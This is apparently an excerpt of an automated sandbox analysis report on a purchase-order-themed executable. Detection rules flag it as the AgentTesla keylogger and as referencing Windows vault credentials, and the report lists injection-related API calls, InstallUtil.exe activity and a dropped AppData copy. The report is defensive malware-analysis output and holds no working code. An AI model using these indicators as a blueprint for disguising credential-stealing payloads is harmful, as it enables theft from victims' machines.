                        Source: 6.2.Xpnzea.exe.3d34a70.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 2.2.InstallUtil.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 2.2.InstallUtil.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 6.2.Xpnzea.exe.3d34a70.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 6.2.Xpnzea.exe.3d34a70.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: initial sampleStatic PE information: Filename: PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E211C8 NtResumeThread,0_2_05E211C8
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E211C1 NtResumeThread,0_2_05E211C1
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E3FCA8 NtProtectVirtualMemory,0_2_05E3FCA8
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E3FCA0 NtProtectVirtualMemory,0_2_05E3FCA0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_061811C8 NtResumeThread,6_2_061811C8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_061811C1 NtResumeThread,6_2_061811C1
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0619FCA8 NtProtectVirtualMemory,6_2_0619FCA8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0619FCA0 NtProtectVirtualMemory,6_2_0619FCA0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BE11C8 NtResumeThread,8_2_05BE11C8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BE11C1 NtResumeThread,8_2_05BE11C1
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BFFCA8 NtProtectVirtualMemory,8_2_05BFFCA8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BFFCA0 NtProtectVirtualMemory,8_2_05BFFCA0
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_0278C3400_2_0278C340
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_02787EF80_2_02787EF8
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_02787EFD0_2_02787EFD
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C972F00_2_05C972F0
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C97FAB0_2_05C97FAB
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C9F8050_2_05C9F805
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C935E80_2_05C935E8
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C985A00_2_05C985A0
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C975090_2_05C97509
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C904E00_2_05C904E0
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C916180_2_05C91618
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C972EB0_2_05C972EB
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C96F390_2_05C96F39
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C96B380_2_05C96B38
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CC38600_2_05CC3860
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CC06580_2_05CC0658
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CC06680_2_05CC0668
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CC3B870_2_05CC3B87
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CC4A680_2_05CC4A68
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E23C080_2_05E23C08
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E22F480_2_05E22F48
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E22F390_2_05E22F39
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E23BF80_2_05E23BF8
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E3A4A00_2_05E3A4A0
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E383740_2_05E38374
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E38EE00_2_05E38EE0
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E3CAC80_2_05E3CAC8
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E335B80_2_05E335B8
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E3ED880_2_05E3ED88
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E3A4900_2_05E3A490
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E3CAB80_2_05E3CAB8
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E702080_2_05E70208
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05E702180_2_05E70218
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05EE00400_2_05EE0040
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_0615D8C00_2_0615D8C0
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_061400110_2_06140011
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_061400400_2_06140040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02654A602_2_02654A60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02653E482_2_02653E48
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0265CF282_2_0265CF28
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02659C622_2_02659C62
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_026541902_2_02654190
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05BD56B02_2_05BD56B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05BD00402_2_05BD0040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05BDBCC82_2_05BDBCC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05BD3F282_2_05BD3F28
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05BDDBF82_2_05BDDBF8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05BD8B5A2_2_05BD8B5A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05BD2AE82_2_05BD2AE8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05BD321B2_2_05BD321B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05BD4FD02_2_05BD4FD0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_02B0C3406_2_02B0C340
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_02B07EF86_2_02B07EF8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_02B07EE86_2_02B07EE8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF72F06_2_05FF72F0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF7FA96_2_05FF7FA9
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FFF8056_2_05FFF805
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF35E86_2_05FF35E8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF85A06_2_05FF85A0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF75096_2_05FF7509
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF04E06_2_05FF04E0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF04CF6_2_05FF04CF
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF16186_2_05FF1618
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF16076_2_05FF1607
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF72E06_2_05FF72E0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF6F6F6_2_05FF6F6F
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF6B386_2_05FF6B38
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF6B366_2_05FF6B36
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06026E706_2_06026E70
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_060238606_2_06023860
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_060206586_2_06020658
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_060206686_2_06020668
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06024A686_2_06024A68
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06023B876_2_06023B87
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06182F486_2_06182F48
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06183C086_2_06183C08
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06183E8B6_2_06183E8B
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06182F3A6_2_06182F3A
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06183BF86_2_06183BF8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0618F1996_2_0618F199
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0618F1A86_2_0618F1A8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0619CAC86_2_0619CAC8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06198EE06_2_06198EE0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_061983746_2_06198374
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0619A4A06_2_0619A4A0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0619CAB86_2_0619CAB8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06198ED16_2_06198ED1
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0619A4906_2_0619A490
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0619ED776_2_0619ED77
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0619ED886_2_0619ED88
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_061935B86_2_061935B8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_062400066_2_06240006
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_062400406_2_06240040
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_064BD8C06_2_064BD8C0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_064A00406_2_064A0040
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_064A00066_2_064A0006
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_026893F87_2_026893F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02684A607_2_02684A60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02683E487_2_02683E48
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0268CF287_2_0268CF28
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02689C707_2_02689C70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_026841907_2_02684190
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05DA56A87_2_05DA56A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05DA00407_2_05DA0040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05DABCC07_2_05DABCC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05DADC007_2_05DADC00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05DA3F207_2_05DA3F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05DA2EE87_2_05DA2EE8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05DA8B607_2_05DA8B60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05DA36307_2_05DA3630
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05DA4FC87_2_05DA4FC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02689C687_2_02689C68
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_00FDC3408_2_00FDC340
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_00FD7EF88_2_00FD7EF8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_00FD7EE88_2_00FD7EE8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A572F08_2_05A572F0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A57FA98_2_05A57FA9
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A5F8058_2_05A5F805
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A585A08_2_05A585A0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A575098_2_05A57509
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A504E08_2_05A504E0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A504CF8_2_05A504CF
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A516078_2_05A51607
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A516188_2_05A51618
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A572E08_2_05A572E0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A56F458_2_05A56F45
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A56B378_2_05A56B37
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A56B388_2_05A56B38
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A838608_2_05A83860
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A806688_2_05A80668
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A806588_2_05A80658
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A83B878_2_05A83B87
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A84A688_2_05A84A68
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BE3C088_2_05BE3C08
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BE2F488_2_05BE2F48
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BE2F398_2_05BE2F39
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BEF1A88_2_05BEF1A8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BEF1998_2_05BEF199
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BE3BF88_2_05BE3BF8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BFA4A08_2_05BFA4A0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BF83748_2_05BF8374
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BF8EE08_2_05BF8EE0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BFCAC88_2_05BFCAC8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BF35B88_2_05BF35B8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BFED888_2_05BFED88
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BFA4908_2_05BFA490
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BF8ED18_2_05BF8ED1
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BFCA288_2_05BFCA28
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05CA00408_2_05CA0040
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05CA00218_2_05CA0021
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05F1D8C08_2_05F1D8C0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05F000408_2_05F00040
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05F000068_2_05F00006
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00CA4A609_2_00CA4A60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00CA9C689_2_00CA9C68
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00CA3E489_2_00CA3E48
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00CACF289_2_00CACF28
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_00CA41909_2_00CA4190
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_055BBCC09_2_055BBCC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_055B8B539_2_055B8B53
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_055BDBF09_2_055BDBF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_055B361B9_2_055B361B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_055B56A89_2_055B56A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_055B00409_2_055B0040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_055B3F209_2_055B3F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_055B4FC89_2_055B4FC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_055B2EE89_2_055B2EE8
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003909000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003909000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFwwpi.exe, vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000038B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000000.1420783379.00000000005A6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFwwpi.exe, vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1484550695.0000000005B40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHvvnj.dll" vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003A03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1464343248.000000000099E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.00000000028DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1486633819.0000000005EF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHvvnj.dll" vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.0000000002BB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.0000000002C6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeBinary or memory string: OriginalFilenameFwwpi.exe, vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: 6.2.Xpnzea.exe.3d34a70.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 6.2.Xpnzea.exe.3d34a70.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 2.2.InstallUtil.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 2.2.InstallUtil.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 6.2.Xpnzea.exe.3d34a70.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 6.2.Xpnzea.exe.3d34a70.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
